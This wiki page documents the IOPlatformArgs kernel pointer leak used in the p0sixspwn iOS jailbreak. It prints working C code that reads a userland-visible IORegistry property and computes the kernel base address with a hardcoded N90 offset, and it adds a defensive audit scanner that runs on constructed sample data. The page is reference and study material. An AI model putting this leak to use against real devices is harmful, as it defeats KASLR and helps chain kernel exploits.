IOPlatformArgs leak

From The iPhone Wiki
Revision as of 18:14, 14 June 2014 by I3ppwn (talk | contribs)

Vulnerability used in p0sixspwn. This vulnerability leaks the kernel base address: the IOPlatformArgs property of the device-tree IORegistry entry is readable from userland, and its first word is a kernel pointer that sits at a fixed (per-device) offset from the kernel base. This is the code:

#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>

unsigned long getKernelBase() {
    unsigned long buf;
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
    if(service)
    {
        CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
        if(macData != NULL && CFDataGetLength(macData) >= (CFIndex)sizeof(buf))
        {
            /*
             void CFDataGetBytes (
             CFDataRef theData,
             CFRange range,
             UInt8 *buffer
             );
             */
            // Copy the first sizeof(buf) bytes of the property; that leading word is a kernel pointer.
            CFDataGetBytes(macData, CFRangeMake(0, sizeof(buf)), (UInt8 *)&buf);
            // XXX: TODO: change decrement based on device.
            // N90 ONLY FOR NOW!
            buf -= 0xE1C000; // Diff between the leaked pointer and the kernel base.
            CFRelease(macData);
            IOObjectRelease(service);
            return buf;
        }
        if(macData != NULL)
            CFRelease(macData);
        IOObjectRelease(service);
    }
    return 0;
} // iH8sn0w

Once the attacker knows the virtual base, the virt_to_phys macro gives the physical base, so both bases are leaked. All of this relies on the IOPlatformArgs bug.
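The following is an added, offline example written for this page; it is not p0sixspwn's or iH8sn0w's code. It shows the audit check a defender would run against any user-readable IORegistry property: scan the raw bytes for words that fall in the kernel's virtual address range, because a single such word defeats KASLR once the delta to the kernel base is known for the build (the page's N90 value 0xE1C000 is reused). It assumes that 32-bit iOS kernel virtual addresses sit at or above 0x80000000, that the static kernel mapping is linear (phys = virt - gVirtBase + gPhysBase, the form the virt_to_phys macro is assumed to take here), and it uses constructed sample blobs in place of a live CFDataGetBytes result; the function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Assumption for this example (not from the page): 32-bit XNU maps the kernel
 * at 0x80000000 and above, so any such word in a user-readable property is
 * treated as a leaked kernel pointer.
 */
#define KERNEL_VA_MIN 0x80000000u

/* Per-device delta between the leaked pointer and the kernel base (N90 value from the page). */
#define N90_DELTA 0xE1C000u

/*
 * Scan a property blob for 32-bit little-endian words that look like kernel
 * pointers. Returns how many were found; up to max_out of them are copied to
 * out[]. A property that is safe to expose to userland returns 0.
 */
size_t find_kernel_pointers(const uint8_t *blob, size_t len, uint32_t *out, size_t max_out)
{
    size_t found = 0;
    for (size_t off = 0; off + sizeof(uint32_t) <= len; off += sizeof(uint32_t)) {
        uint32_t word;
        memcpy(&word, blob + off, sizeof word);   /* little-endian host assumed, as on iOS */
        if (word >= KERNEL_VA_MIN) {
            if (found < max_out)
                out[found] = word;
            found++;
        }
    }
    return found;
}

/* The arithmetic the page's exploit performs: base = leaked pointer - per-device delta. */
uint32_t kernel_base_from_leak(uint32_t leaked_ptr, uint32_t delta)
{
    return leaked_ptr - delta;
}

/*
 * Assumed linear kernel mapping: phys = virt - gVirtBase + gPhysBase.
 * The two base values passed in are constructed for this example.
 */
uint32_t virt_to_phys(uint32_t virt, uint32_t g_virt_base, uint32_t g_phys_base)
{
    return virt - g_virt_base + g_phys_base;
}

/* Constructed sample of what CFDataGetBytes might return on an unpatched device. */
static const uint8_t sample_leaky_blob[] = {
    0x00, 0xC0, 0xE1, 0x80,   /* 0x80E1C000: a kernel pointer */
    0x10, 0x00, 0x00, 0x00,   /* 0x00000010: flags, not a pointer */
};

/* Constructed sample for a device where the pointer field is zeroed before export. */
static const uint8_t sample_clean_blob[] = {
    0x00, 0x00, 0x00, 0x00,
    0x10, 0x00, 0x00, 0x00,
};

int main(void)
{
    uint32_t ptrs[4];
    size_t n = find_kernel_pointers(sample_leaky_blob, sizeof sample_leaky_blob, ptrs, 4);
    if (n == 0) {
        puts("property contains no kernel-range words");
        return 0;
    }
    uint32_t base = kernel_base_from_leak(ptrs[0], N90_DELTA);
    printf("leaked pointer 0x%08X -> kernel base 0x%08X\n", ptrs[0], base);
    /* gVirtBase/gPhysBase below are constructed values, not real device constants. */
    printf("physical base (constructed mapping) 0x%08X\n", virt_to_phys(base, 0x80000000u, 0x40000000u));
    printf("clean blob: %zu kernel-range words\n",
           find_kernel_pointers(sample_clean_blob, sizeof sample_clean_blob, ptrs, 4));
    return 0;
}
```

The scan is deliberately dumb (every aligned word in range counts) so that it errs on the side of flagging: the lesson of this bug is that a kernel-side structure copied verbatim into a registry property carries whatever pointers it contains, and the fix is to strip or zero those fields before export rather than to rely on the property looking opaque.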